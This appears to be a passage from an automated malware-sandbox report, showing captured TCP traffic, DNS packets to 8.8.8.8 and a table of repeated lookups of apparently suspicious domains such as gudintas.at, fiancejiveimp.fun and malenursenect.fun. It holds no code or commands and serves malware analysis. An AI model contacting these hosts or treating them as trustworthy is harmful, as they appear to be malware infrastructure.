                                                                                                        Oct 3, 2023 18:05:15.707501888 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:15.707608938 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:15.707700014 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:15.709657907 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:15.709697962 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:15.819921017 CEST4993380192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:15.926279068 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:15.926493883 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:15.927808046 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:15.927824974 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:15.928184986 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:16.064209938 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:16.106465101 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:16.364219904 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:16.364512920 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:16.364583969 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:16.364645958 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:16.364672899 CEST44349934172.67.171.76192.168.2.3
                                                                                                        Oct 3, 2023 18:05:16.364697933 CEST49934443192.168.2.3172.67.171.76
                                                                                                        Oct 3, 2023 18:05:16.364705086 CEST44349934172.67.171.76192.168.2.3

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 3, 2023 18:02:18.768836021 CEST5272653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:19.246375084 CEST53527268.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:20.700793982 CEST5264353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:20.815577030 CEST53526438.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:22.300874949 CEST5471153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:22.678344965 CEST53547118.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:24.100853920 CEST5853853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:24.512779951 CEST53585388.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:26.097414970 CEST5472353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:26.203224897 CEST53547238.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:27.794576883 CEST5866353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:28.306099892 CEST53586638.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:29.250464916 CEST6131953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:29.359745026 CEST53613198.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:30.762228012 CEST5819353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:30.867894888 CEST53581938.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:32.272572041 CEST5447753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:32.381547928 CEST53544778.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:33.778732061 CEST5828353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:34.134140015 CEST53582838.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:35.315951109 CEST6552053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:35.422173977 CEST53655208.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:36.865773916 CEST4963353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:37.087529898 CEST53496338.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:40.085063934 CEST6520753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:40.191492081 CEST53652078.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:40.949073076 CEST5416553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:41.194246054 CEST53541658.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:41.258281946 CEST5854253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:41.373034954 CEST53585428.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:41.652050972 CEST5360453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:41.757890940 CEST53536048.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:41.865938902 CEST5142753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:41.966269016 CEST53514278.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:43.269377947 CEST5038253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:43.375426054 CEST53503828.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:44.549403906 CEST5813153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:44.661958933 CEST53581318.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:45.041138887 CEST6003853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:45.125330925 CEST5657053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:45.231719017 CEST53565708.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:45.269568920 CEST53600388.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:45.703383923 CEST5784653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:45.809530973 CEST53578468.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.085344076 CEST4920453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:46.194880962 CEST53492048.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.243925095 CEST4956253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:46.255136967 CEST5131353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:46.360810041 CEST53495628.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.360833883 CEST53513138.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.805509090 CEST5893553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:46.824894905 CEST5830053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:46.836798906 CEST5731553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:46.911353111 CEST53589358.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.936570883 CEST53583008.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:46.948874950 CEST53573158.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.383145094 CEST4965053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:47.496278048 CEST53496508.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:47.540661097 CEST5515453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:47.647365093 CEST53551548.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.012129068 CEST5156853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:48.126421928 CEST5598553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:48.127396107 CEST53515688.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.231897116 CEST53559858.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.346016884 CEST5446153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:48.452943087 CEST53544618.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:48.580135107 CEST5730953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:48.687107086 CEST53573098.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:49.683921099 CEST6070553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:49.797671080 CEST53607058.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.202205896 CEST5592753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:50.313868046 CEST53559278.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.431952000 CEST5158253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:50.538801908 CEST53515828.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:50.745287895 CEST5526053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:50.859267950 CEST53552608.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.291420937 CEST5882553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:51.406701088 CEST53588258.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.443500996 CEST5829753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:51.556308985 CEST53582978.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:51.850390911 CEST5908453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:51.964147091 CEST53590848.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.023659945 CEST6201153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:52.140774965 CEST53620118.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.395771027 CEST6287753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:52.495866060 CEST53628778.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:52.726372957 CEST6166253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:52.953775883 CEST5641053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:53.059636116 CEST53564108.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.733108044 CEST6166253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:53.805510998 CEST5423853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:53.841989040 CEST53616628.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:53.911035061 CEST53542388.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.278919935 CEST5437753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:54.385355949 CEST53543778.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.830756903 CEST5949153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:54.856241941 CEST5622253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:54.936527967 CEST53594918.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:54.964479923 CEST53562228.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.414472103 CEST5070953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:55.415195942 CEST4972753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:55.521279097 CEST53497278.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.531366110 CEST53507098.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:55.928056955 CEST5414453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:56.033675909 CEST53541448.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.123781919 CEST6067553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:56.224220037 CEST53606758.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.537497044 CEST6389053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:56.643771887 CEST53638908.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:56.662497044 CEST6254953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:56.768393040 CEST53625498.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.146254063 CEST5645453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:57.258022070 CEST53564548.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:57.756023884 CEST6044853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:57.862906933 CEST53604488.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.202155113 CEST5321953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:58.308195114 CEST53532198.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.348805904 CEST5285953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:58.455456972 CEST53528598.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.856096029 CEST5609353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:58.961735010 CEST53560938.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:58.969285965 CEST6171453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:59.074995995 CEST53617148.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.426625967 CEST6169353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:59.532624006 CEST53616938.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:02:59.590012074 CEST5544853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:02:59.696110964 CEST53554488.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:00.216002941 CEST4960853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:00.322927952 CEST53496088.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.410975933 CEST6338453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:01.517075062 CEST53633848.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:01.970621109 CEST5748353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:02.079523087 CEST53574838.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:04.584605932 CEST5322153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:04.695039988 CEST53532218.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.240778923 CEST6335153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:05.346637964 CEST53633518.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.704818964 CEST5735153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:05.799854040 CEST5278953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:05.810187101 CEST53573518.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:05.906250954 CEST53527898.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:06.242111921 CEST5840153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:06.335071087 CEST4931153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:06.349039078 CEST53584018.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:06.444112062 CEST53493118.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:06.793595076 CEST4926653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:06.899698973 CEST53492668.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:06.927793980 CEST6040853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:07.033339977 CEST53604088.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:07.466041088 CEST6190053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:07.565373898 CEST5549953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:07.572103977 CEST53619008.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:07.671274900 CEST53554998.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:08.021378994 CEST6524853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:08.122029066 CEST53652488.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:08.176949978 CEST5233153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:08.283277035 CEST53523318.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:08.782617092 CEST5302753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:08.889151096 CEST6551253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:08.892225981 CEST53530278.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:08.994808912 CEST53655128.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:09.380963087 CEST5726053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:09.494451046 CEST53572608.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:10.378102064 CEST5212053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:10.487987041 CEST53521208.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:10.964281082 CEST6329153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:11.070471048 CEST53632918.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:14.537038088 CEST5337553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:14.645804882 CEST53533758.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:15.122534990 CEST6404053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:15.232152939 CEST53640408.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:15.703057051 CEST5462753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:15.808784962 CEST53546278.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:16.271769047 CEST6034653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:16.377912045 CEST53603468.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:16.823379993 CEST5351653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:16.930097103 CEST53535168.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:17.379071951 CEST6195453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:17.485625982 CEST53619548.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:17.921377897 CEST6531653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:18.030464888 CEST53653168.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:18.786281109 CEST5263853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:18.892719030 CEST53526388.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:03:57.768801928 CEST6009953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST53600998.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:01.861069918 CEST5864953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST53586498.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:06.899744987 CEST5537553192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST53553758.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:11.339785099 CEST5104453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST53510448.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:15.842005968 CEST6476153192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST53647618.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:20.507364035 CEST4987953192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST53498798.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:26.098458052 CEST6199253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST53619928.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:33.293589115 CEST5944353192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST53594438.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:37.065207958 CEST5335853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST53533588.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:42.102982998 CEST6037753192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST53603778.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:46.306070089 CEST6008053192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST53600808.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:51.142764091 CEST6076253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST53607628.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:04:56.282331944 CEST5788853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST53578888.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:00.045187950 CEST6057653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST53605768.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:03.900516987 CEST5661653192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST53566168.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:07.870399952 CEST5072853192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST53507288.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:12.735975027 CEST5124453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST53512448.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:14.289756060 CEST5915253192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:14.750711918 CEST53591528.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:14.761032104 CEST4980453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:15.351339102 CEST53498048.8.8.8192.168.2.3
                                                                                                        Oct 3, 2023 18:05:15.381403923 CEST6223453192.168.2.38.8.8.8
                                                                                                        Oct 3, 2023 18:05:15.491332054 CEST53622348.8.8.8192.168.2.3

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Oct 3, 2023 18:02:18.768836021 CEST192.168.2.38.8.8.80xeb10Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:20.700793982 CEST192.168.2.38.8.8.80x731bStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:22.300874949 CEST192.168.2.38.8.8.80x21eaStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:24.100853920 CEST192.168.2.38.8.8.80xce21Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:26.097414970 CEST192.168.2.38.8.8.80x5c49Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:27.794576883 CEST192.168.2.38.8.8.80xae94Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:29.250464916 CEST192.168.2.38.8.8.80x4afcStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:30.762228012 CEST192.168.2.38.8.8.80xe81cStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:32.272572041 CEST192.168.2.38.8.8.80x448eStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:33.778732061 CEST192.168.2.38.8.8.80x5539Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:35.315951109 CEST192.168.2.38.8.8.80xb9e5Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:36.865773916 CEST192.168.2.38.8.8.80x85e9Standard query (0)h170811.srv22.test-hf.suA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.085063934 CEST192.168.2.38.8.8.80xe0b2Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:40.949073076 CEST192.168.2.38.8.8.80x1840Standard query (0)fullppc.xyzA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.258281946 CEST192.168.2.38.8.8.80xc66bStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.652050972 CEST192.168.2.38.8.8.80xb10cStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:41.865938902 CEST192.168.2.38.8.8.80xfa9cStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:43.269377947 CEST192.168.2.38.8.8.80xaf2bStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:44.549403906 CEST192.168.2.38.8.8.80x6d69Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.041138887 CEST192.168.2.38.8.8.80xe3c3Standard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.125330925 CEST192.168.2.38.8.8.80xeb84Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:45.703383923 CEST192.168.2.38.8.8.80xa393Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.085344076 CEST192.168.2.38.8.8.80x9019Standard query (0)farformafor.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.243925095 CEST192.168.2.38.8.8.80x59cfStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.255136967 CEST192.168.2.38.8.8.80xeb8fStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.805509090 CEST192.168.2.38.8.8.80xab5dStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.824894905 CEST192.168.2.38.8.8.80x14c9Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:46.836798906 CEST192.168.2.38.8.8.80x141cStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:47.383145094 CEST192.168.2.38.8.8.80xdda4Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:47.540661097 CEST192.168.2.38.8.8.80x4953Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.012129068 CEST192.168.2.38.8.8.80xe059Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.126421928 CEST192.168.2.38.8.8.80xc722Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.346016884 CEST192.168.2.38.8.8.80xf3deStandard query (0)gudintas.atA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:48.580135107 CEST192.168.2.38.8.8.80x13e9Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:49.683921099 CEST192.168.2.38.8.8.80x6cStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.202205896 CEST192.168.2.38.8.8.80xe6b3Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.431952000 CEST192.168.2.38.8.8.80x79e4Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:50.745287895 CEST192.168.2.38.8.8.80xabbdStandard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.291420937 CEST192.168.2.38.8.8.80xb534Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.443500996 CEST192.168.2.38.8.8.80x5032Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:51.850390911 CEST192.168.2.38.8.8.80x5144Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.023659945 CEST192.168.2.38.8.8.80x5e00Standard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.395771027 CEST192.168.2.38.8.8.80x47a7Standard query (0)malenursenect.funA (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:02:52.726372957 CEST192.168.2.38.8.8.80x30beStandard query (0)fiancejiveimp.funA (IP address)IN (0x0001)false
